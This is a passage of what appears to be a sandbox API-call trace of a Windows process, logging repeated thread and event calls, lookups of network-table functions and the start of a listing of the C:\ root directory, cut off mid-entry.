0x244 [0086.856] GetCurrentThreadId () returned 0x244 [0086.856] GetCurrentThreadId () returned 0x244 [0086.856] ResetEvent (hEvent=0xb8) returned 1 [0086.856] GetCurrentThreadId () returned 0x244 [0086.856] GetCurrentThreadId () returned 0x244 [0086.856] SetEvent (hEvent=0xbc) returned 1 [0086.856] SetEvent (hEvent=0xb8) returned 1 [0086.856] CloseHandle (hObject=0x390) returned 1 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] ResetEvent (hEvent=0xb8) returned 1 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] ResetEvent (hEvent=0xb8) returned 1 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] SetEvent (hEvent=0xbc) returned 1 [0086.857] SetEvent (hEvent=0xb8) returned 1 [0086.857] CloseHandle (hObject=0x390) returned 1 [0086.857] GetProcAddress (hModule=0x74810000, lpProcName="GetIfEntry2") returned 0x748149ab [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] ResetEvent (hEvent=0xb8) returned 1 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] GetCurrentThreadId () returned 0x244 [0086.857] ResetEvent (hEvent=0xb8) returned 1 [0086.857] GetCurrentThreadId () returned 0x244 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] SetEvent (hEvent=0xbc) returned 1 [0086.858] SetEvent (hEvent=0xb8) returned 1 [0086.858] CloseHandle (hObject=0x390) returned 1 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] ResetEvent (hEvent=0xb8) returned 1 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] ResetEvent (hEvent=0xb8) returned 1 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] GetCurrentThreadId () returned 0x244 [0086.858] SetEvent (hEvent=0xbc) returned 1 [0086.858] SetEvent (hEvent=0xb8) returned 1 [0086.858] CloseHandle (hObject=0x390) returned 1 [0086.859] GetProcAddress (hModule=0x74810000, lpProcName="GetIpForwardTable2") returned 0x74814d3e [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] ResetEvent (hEvent=0xb8) returned 1 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] ResetEvent (hEvent=0xb8) returned 1 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] SetEvent (hEvent=0xbc) returned 1 [0086.859] SetEvent (hEvent=0xb8) returned 1 [0086.859] CloseHandle (hObject=0x390) returned 1 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] ResetEvent (hEvent=0xb8) returned 1 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] ResetEvent (hEvent=0xb8) returned 1 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] GetCurrentThreadId () returned 0x244 [0086.859] SetEvent (hEvent=0xbc) returned 1 [0086.859] SetEvent (hEvent=0xb8) returned 1 [0086.859] CloseHandle (hObject=0x390) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] ResetEvent (hEvent=0xb8) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] ResetEvent (hEvent=0xb8) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] SetEvent (hEvent=0xbc) returned 1 [0086.860] SetEvent (hEvent=0xb8) returned 1 [0086.860] CloseHandle (hObject=0x390) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] ResetEvent (hEvent=0xb8) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] ResetEvent (hEvent=0xb8) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] SetEvent (hEvent=0xbc) returned 1 [0086.860] SetEvent (hEvent=0xb8) returned 1 [0086.860] CloseHandle (hObject=0x390) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.860] ResetEvent (hEvent=0xb8) returned 1 [0086.860] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] ResetEvent (hEvent=0xb8) returned 1 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] SetEvent (hEvent=0xbc) returned 1 [0086.861] SetEvent (hEvent=0xb8) returned 1 [0086.861] CloseHandle (hObject=0x390) returned 1 [0086.861] GetProcAddress (hModule=0x74810000, lpProcName="GetIpNetEntry2") returned 0x74814df8 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] ResetEvent (hEvent=0xb8) returned 1 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] ResetEvent (hEvent=0xb8) returned 1 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] GetCurrentThreadId () returned 0x244 [0086.861] SetEvent (hEvent=0xbc) returned 1 [0086.861] SetEvent (hEvent=0xb8) returned 1 [0086.861] CloseHandle (hObject=0x390) returned 1 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] ResetEvent (hEvent=0xb8) returned 1 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] ResetEvent (hEvent=0xb8) returned 1 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] SetEvent (hEvent=0xbc) returned 1 [0086.862] SetEvent (hEvent=0xb8) returned 1 [0086.862] CloseHandle (hObject=0x390) returned 1 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] ResetEvent (hEvent=0xb8) returned 1 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] ResetEvent (hEvent=0xb8) returned 1 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] GetCurrentThreadId () returned 0x244 [0086.862] SetEvent (hEvent=0xbc) returned 1 [0086.862] SetEvent (hEvent=0xb8) returned 1 [0086.862] CloseHandle (hObject=0x390) returned 1 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] ResetEvent (hEvent=0xb8) returned 1 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] ResetEvent (hEvent=0xb8) returned 1 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] GetCurrentThreadId () returned 0x244 [0086.863] SetEvent (hEvent=0xbc) returned 1 [0086.863] SetEvent (hEvent=0xb8) returned 1 [0086.863] CloseHandle (hObject=0x390) returned 1 [0086.863] GetProcAddress (hModule=0x74810000, lpProcName="FreeMibTable") returned 0x74813d1b [0086.863] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0086.864] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0086.864] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0086.864] GetProcAddress (hModule=0x77c10000, lpProcName="NsiFreeTable") returned 0x77c118f4 [0086.865] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 Thread: id = 10 os_tid = 0x114 [0087.438] SysReAllocStringLen (in: pbstr=0x622fb04*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x622fb04*="KERNEL32.DLL") returned 1 [0087.438] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0087.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.443] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0087.443] SysReAllocStringLen (in: pbstr=0x622fb04*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x622fb04*="KERNEL32.DLL") returned 1 [0087.443] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0087.444] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.447] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0087.447] SysReAllocStringLen (in: pbstr=0x622fae0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x622fae0*="KERNEL32.DLL") returned 1 [0087.447] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0087.448] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.451] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.454] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0087.456] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0087.470] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0087.470] ResetEvent (hEvent=0x248) returned 1 Thread: id = 11 os_tid = 0xaf0 [0100.487] SysReAllocStringLen (in: pbstr=0x655f4ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x655f4ec*="KERNEL32.DLL") returned 1 [0100.487] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0100.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0100.492] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0100.493] SysReAllocStringLen (in: pbstr=0x655f4ec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x655f4ec*="KERNEL32.DLL") returned 1 [0100.493] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0100.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0100.497] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0100.498] SysReAllocStringLen (in: pbstr=0x655f4c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x655f4c8*="KERNEL32.DLL") returned 1 [0100.498] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0100.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0100.502] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0100.505] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 12 os_tid = 0xb2c [0102.186] SysReAllocStringLen (in: pbstr=0x68cf3fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68cf3fc*="KERNEL32.DLL") returned 1 [0102.186] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0102.186] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0102.190] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0102.190] SysReAllocStringLen (in: pbstr=0x68cf3fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68cf3fc*="KERNEL32.DLL") returned 1 [0102.190] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0102.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0102.193] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0102.194] SysReAllocStringLen (in: pbstr=0x68cf3d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68cf3d8*="KERNEL32.DLL") returned 1 [0102.194] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0102.194] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0102.197] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0102.200] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0102.337] SysReAllocStringLen (in: pbstr=0x68cf6b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68cf6b0*="KERNEL32.DLL") returned 1 [0102.337] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0102.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0102.342] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 58 os_tid = 0xb0c [0108.742] SysReAllocStringLen (in: pbstr=0x670f6d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x670f6d4*="KERNEL32.DLL") returned 1 [0108.742] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.746] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0108.746] SysReAllocStringLen (in: pbstr=0x670f6d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x670f6d4*="KERNEL32.DLL") returned 1 [0108.746] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.750] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0108.751] SysReAllocStringLen (in: pbstr=0x670f6b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x670f6b0*="KERNEL32.DLL") returned 1 [0108.751] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.751] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.754] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0108.757] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0108.761] SysReAllocStringLen (in: pbstr=0x670f988*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x670f988*="KERNEL32.DLL") returned 1 [0108.761] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.765] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 75 os_tid = 0xb10 [0108.858] SysReAllocStringLen (in: pbstr=0x68df55c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68df55c*="KERNEL32.DLL") returned 1 [0108.858] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.862] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0108.862] SysReAllocStringLen (in: pbstr=0x68df55c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68df55c*="KERNEL32.DLL") returned 1 [0108.862] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.863] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.866] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0108.867] SysReAllocStringLen (in: pbstr=0x68df538*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68df538*="KERNEL32.DLL") returned 1 [0108.867] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0108.874] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0108.877] SysReAllocStringLen (in: pbstr=0x68df810*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x68df810*="KERNEL32.DLL") returned 1 [0108.877] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0108.877] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0108.881] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 78 os_tid = 0x5e4 [0112.786] SysReAllocStringLen (in: pbstr=0x63ff4b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff4b4*="KERNEL32.DLL") returned 1 [0112.786] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0112.787] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.789] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.790] SysReAllocStringLen (in: pbstr=0x63ff4b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff4b4*="KERNEL32.DLL") returned 1 [0112.790] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0112.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.794] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.794] SysReAllocStringLen (in: pbstr=0x63ff490*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff490*="KERNEL32.DLL") returned 1 [0112.794] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0112.794] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.797] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.807] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.821] SysReAllocStringLen (in: pbstr=0x63ff768*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff768*="KERNEL32.DLL") returned 1 [0112.821] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0112.821] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0112.823] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 127 os_tid = 0xb18 [0128.311] SysReAllocStringLen (in: pbstr=0x641f684*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x641f684*="KERNEL32.DLL") returned 1 [0128.311] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0128.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.316] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.317] SysReAllocStringLen (in: pbstr=0x641f684*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x641f684*="KERNEL32.DLL") returned 1 [0128.317] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0128.317] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.321] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.321] SysReAllocStringLen (in: pbstr=0x641f660*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x641f660*="KERNEL32.DLL") returned 1 [0128.321] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0128.322] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0128.325] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0128.329] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0128.331] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0128.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f3c0) returned 1 [0128.349] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x641eec8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.350] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x641ee9c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.390] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x641f0e8 | out: lpFindFileData=0x641f0e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x77ab30 [0128.390] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0128.391] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0128.391] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0128.391] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0128.391] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0128.391] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0128.391] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0128.392] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xf456e360, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0128.392] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0128.392] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0128.392] FindNextFileW (in: hFindFile=0x77ab30, lpFindFileData=0x641f0f8 | out: lpFindFileData=0x641f0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, 